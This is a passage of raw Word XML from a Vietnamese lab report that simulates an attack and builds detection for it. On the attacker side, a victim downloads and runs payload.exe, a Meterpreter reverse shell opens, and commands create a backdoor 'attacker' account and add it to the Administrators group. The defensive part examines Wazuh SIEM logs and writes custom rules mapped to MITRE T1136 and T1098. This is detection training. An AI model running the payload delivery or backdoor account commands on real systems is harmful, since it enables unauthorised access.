    <w:p w14:paraId="3A3D144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sẽ xuất hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543FC1EE" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Máy Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFB502"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Mở Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFD6A1" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://192.168.174.132:8000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0869D49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B4FD3AD" wp14:editId="007871BD">
            <wp:extent cx="5730875" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="image52.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="57" name="image52.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0CEF6E"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Download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A3B9C"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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD91AF"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chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2AC163"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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649D28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7B003A1" wp14:editId="2687F229">
            <wp:extent cx="5730875" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="image29.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="37" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D42AE"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Windows Defender bật, có thể cần tắt trong môi trường lab để payload chạy.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293E04E" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10FB0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Ngay lập tức</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B54EC"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Metasploit sẽ hiển thị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6275B49A"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Meterpreter session 1 opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E741A"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861D67D" wp14:editId="6C6E5575">
            <wp:extent cx="5730875" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="159" name="image158.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="159" name="image158.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1689100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8E276" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08749A9E"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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C596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FD15C25" wp14:editId="7DC8CDFB">
            <wp:extent cx="5730875" cy="1397000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153" name="image149.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="153" name="image149.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1397000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE41C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sau đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528EFB50"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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BFB90"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B930E85" wp14:editId="73A0D35D">
            <wp:extent cx="5730875" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="image94.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="107" name="image94.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE9270" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tạo User độc hại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44A556"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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40879521"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net user attacker P@ssw0rd123 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70F85E"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BD988D3" wp14:editId="6362F22C">
            <wp:extent cx="5730875" cy="1739900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="149" name="image132.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="149" name="image132.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1739900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F4FEC6"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Cho quyền Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DEB67D"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net localgroup administrators attacker /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BBAF8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910829A"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net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F24DD"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net localgroup administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E600B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5F174FF" wp14:editId="7B2253DE">
            <wp:extent cx="5730875" cy="31242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2" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB70CF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mới đã được tạo và thêm vào nhóm quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278D29E" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_heading=h.98oh9xjbuw4x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="73" w:name="_Toc234664938"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5. Kiểm tra trên Wazuh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="0034D969" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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Trên SIEM tiến hành kiểm tra log và alert liên quan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068534BD" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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Xuất hiện nhiều hành vi bất thường user được tạo gán quyền Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44F4DA"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EF867CD" wp14:editId="4AB322ED">
            <wp:extent cx="5730875" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116" name="image105.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="116" name="image105.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="596900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53722E4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Mở chi tiết log và chú ý vào các trường nghi vấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E65BCF2" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000E6C6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54FB6E3" wp14:editId="6E2805AB">
            <wp:extent cx="5730875" cy="25146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22" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2514600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44607E42" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D88C9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Chọn nút filter ( dấu cộng) để tiến hành theo luồng event kiểm tra thêm, chú ý event User account enabled or created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296191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06E5DD8" wp14:editId="7512F085">
            <wp:extent cx="5730875" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133" name="image116.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="133" name="image116.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="533400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="134DE6A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Mở chi tiết log ở field </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>data.win.system.message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy new account, như vậy kẻ xấu đã tạo thêm user mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E960682"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2A22256" wp14:editId="510C3F8B">
            <wp:extent cx="5730875" cy="5308600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="image73.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="67" name="image73.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5308600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C847667" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_heading=h.2mj3yvn49lji" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="75" w:name="_Toc234664939"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6. Xây dựng Rule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="10BF2AB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Chạy lệnh này trên Wazuh Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D61AB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sudo nano /var/ossec/etc/rules/local_rules.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB20A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DEE8C8A" wp14:editId="23926A31">
            <wp:extent cx="5730875" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121" name="image124.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="121" name="image124.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="533400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0F938" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F559C8F" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">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Phát hiện tạo User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3263D64E"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&lt;group name="windows,custom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2140F2"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 id="100704" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C55481"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&lt;if_sid&gt;60109&lt;/if_sid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4786B7"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190820FB"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[CUSTOM] New Local User Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5F275"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7B9351F6"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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC33F1"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&lt;id&gt;T1136&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18217BD8"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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5798D865"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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB28D1C"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&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC2CA8" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAA1FCB" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9284C3"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Phát hiện thêm vào Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC1AC3"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&lt;group name="windows,custom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B704C"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 id="100705" level="15"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2FFC10"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&lt;if_sid&gt;60154&lt;/if_sid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5AD3C"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63338BD8"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[CUSTOM] User Added To Administrators Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88CE63"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5A62928A"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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129CAB87"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&lt;id&gt;T1098&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D0308"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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A0B18"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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628729B"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&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C18AD0" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F7139E"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300AE65" wp14:editId="0C2F354E">
            <wp:extent cx="5730875" cy="32004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80"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3200400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B88E3B" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_heading=h.e7s9nfiftvc2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="77" w:name="_Toc234664940"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7. Thực hiện lại tấn công sau khi tạo rule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="0B3554C3"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Xóa user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180182D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net user attacker /delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04A528"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tạo lại và add vào Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640B47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net user attacker P@ssw0rd123 /add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58174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net localgroup administrators attacker /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8163F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Alert sẽ sinh ngay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4FA08"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A1CB84C" wp14:editId="0AD6EF9D">
            <wp:extent cx="5730875" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="image83.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="95" name="image83.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
